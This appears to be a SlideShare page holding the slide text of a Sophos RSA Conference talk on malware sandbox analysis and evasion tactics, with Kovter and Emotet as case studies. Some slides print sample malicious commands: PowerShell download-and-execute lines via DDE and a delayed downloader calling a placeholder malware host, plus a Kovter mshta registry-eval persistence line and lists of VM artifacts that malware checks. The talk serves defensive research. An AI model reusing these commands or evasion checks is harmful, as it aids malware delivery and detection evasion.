Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 

Kürzlich hochgeladen (20)

HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 

Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1

  • 1. SESSION ID: #RSAC Michael Wood PLAYING GAMES IN THE SANDBOX— DYNAMIC ANALYSIS AND MODERN EVASION TACTICS AIR-F03 Senior Manager, Dynamic Protection, SophosLabs Sophos
  • 2. # R S A C Cloud Sandbox 2 Internet Known Good Execute Known Bad? Sandbox
  • 3. # R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior What is a Cloud Sandbox useful for? 3
  • 4. # R S A C Example: 0-day DDE exploit 4 Intended use – spreadsheet data link { DDEAUTO excel "C:My DocumentsProfits.xls“ "Sheet1!R1C1:R4C4" p } Exploited use – malware download { DDEAUTO cmd.exe “/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw2 3FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell - e $a1” }
  • 5. # R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior • But what if the threat behaves differently in the Sandbox? What is a Cloud Sandbox useful for? 5
  • 6. # R S A C Evasive threats 6 IF is_sandbox() THEN something_good() ELSE something_bad()
  • 7. # R S A C is_sandbox() •Artifacts: Files, Registry Keys, Drivers, Disk/CPU names •Behavior: CPU behavior Anti-VM •Artifacts: tools or scripts, realistic hardware •Behavior: human-like activity Anti-sandbox •Explicit delay: Sleep(…) •Implicit delay: user interaction required Timing
  • 8. # R S A C something_good() ExitProcess() Loop forever Self delete
  • 10. # R S A C Kovter Malware HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCUsoftware4a9e7b11c06bee3829"); eval(ztJ4n7);
  • 11. # R S A C Kovter – VM Evasion Tests 11 Running processes VBoxService.exe VMwareUser.exe Registry keys HARDWAREACPIDSDTVBOX__ HKLMSOFTWAREVMWare, Inc. Other artifacts .vmmemctl PIPE VMwareCopyPasteSetClipboard event
  • 12. # R S A C CPUID - Artifacts CPUID Vendor -> “GenuineIntel” CPUID Hypervisor -> 0x0 CPUID Vendor -> “KVMKVMKVM” CPUID Hypervisor -> 0x80000000
  • 13. # R S A C CPUID - Timing CPUID… CPUID… …“GenuineIntel” t1 t2 t1t2 CPUID cost
  • 14. # R S A C Evasive Activity Legitimacy
  • 16. # R S A C Document Malware
  • 17. # R S A C Macro Evasion: Realistic Filename “Is my file name… “ “… only hexadecimal characters?“
  • 18. # R S A C Macro Evasion: Realistic History “Is there fewer than 3 recently used files?“
  • 19. # R S A C Macro Evasion: Blacklist Processes “Are there any VM or analysis tools running?“
  • 20. # R S A C Macro Evasion: GEO IP “Does the GEO IP match my target?“
  • 21. # R S A C Leverage #1 - Protection is_sandbox() something_bad()
  • 22. # R S A C Leverage #2 – Bypass Does C:B78AE926 exist? No: Run evasions Yes: Run malware
  • 23. # R S A C Leverage #3 - Vaccination is_sandbox() == TRUE
  • 25. # R S A C Documents: Some Clicks Required
  • 26. # R S A C Time: 0 min Time: 2 min Time: 5 min Explicit Delay powershell “ sleep 300; new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',‘%TEMP%Local.exe') & start-process ‘%TEMP%Local.exe'" Sandbox Analysis
  • 27. # R S A C Implicit Delay: Busy work FOR i=0; i < 500,000; i++ DO IsDebuggerPresent() END FOR Bare Metal Virtual Machine Sandbox
  • 28. # R S A C Typical Human Input GetLastInputInfo() GetCursorPos()
  • 29. # R S A C File Structure > unzip -l IMAGES.ZIP Length Date Time Name --------- ---------- ----- ---- 518144 2018-01-17 02:17 IMG_1715.jpg <--- Windows EXE!!! 364671 2018-01-13 12:39 IMG_1716.jpg <--- JPEG image 430040 2018-01-13 12:39 IMG_1717.jpg <--- JPEG image 452211 2018-01-13 12:39 IMG_1718.jpg <--- JPEG image 391279 2018-01-13 12:38 IMG_1719.jpg <--- JPEG image --------- ------- 2156345 5 files
  • 31. # R S A C Emotet Delivery: Some Clicks Required
  • 32. # R S A C Emotet: Custom Loader Jul 2017 – Decrypts in-place Aug 2017 – Loader added Packed EXE decrypt Emotet EXE Packed EXE decrypt Emotet EXE Loader EXE
  • 33. # R S A C Emotet EXE Emotet – Oct 2017, is_sandbox() v1 Loader EXE evasions is_sandboxsample.exe artifact.exe John Doe TEQUILABOOMBOOM Wilbert / SC admin / SystemIT C:123email.doc C:email.htm C:email.doc
  • 34. # R S A C Emotet: Loader In-Memory Obfuscation Emotet EXE Loader EXE busy work Stolen Code 1. New memory region for stolen instructions 2. Steal instructions from EXE, patch in detour to “busy work” routine evasions
  • 35. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely
  • 36. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “TEQUILABOOMBOOM” Queries for sensitive data remain
  • 37. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “sample.exe” Huge increase in file system inspection activity
  • 38. # R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Avoid bailout “tell” Repeated increase in file system inspection activity
  • 39. # R S A C Emotet: Jan 2018, Evasion Fragments 39 is_sandbox() disabled, but … Dec 2017 TEQUILABOOMBOOM SystemIT John Doe Jan 2018 "T E Q U I L A B O O M B O O M” “S y s t e m I T” Aller Doe
  • 40. # R S A C Emotet: Feb 2018, Evasion Retraction Emotet EXE Loader EXE Stolen Code busy work evasions
  • 41. # R S A C Emotet Evasive Tactic Timeline Jul 2017 •Busy work Aug 2017 •Loader module Oct 2017 •is_sandbox v1 Dec 2017 •is_sandbox v2 •something_good v2 Jan 2018 •is_sandbox “off” •Fragments remain Feb 2018 •is_sandbox removed
  • 43. # R S A C Summary Leverage • is_sandbox() == something_bad() Battle ground • Infinitely many tactics, equally many defenses Raise the bar • Attacks require greater depth & complexity
  • 44. # R S A C Predictions Virtual machine tactics - expect decline •Existing mitigations, assets in the cloud Human-like behavior – expect growth •Real user activity, victim profiling Avoid detonation – expect growth •Dodge execution in the Sandbox altogether
  • 45. # R S A C Actions: Engage, Familiarize, Experiment • Security partner’s approach to evasive threatsEngage • Open-source tools to test anti-sandbox tacticsFamiliarize • Deploy your own open-source sandboxExperiment PAFish Tool https://github.com/a0rtega/pafish Al-KhaserTool https://github.com/LordNoteworthy/al-khaser Cuckoo Sandbox https://cuckoosandbox.org/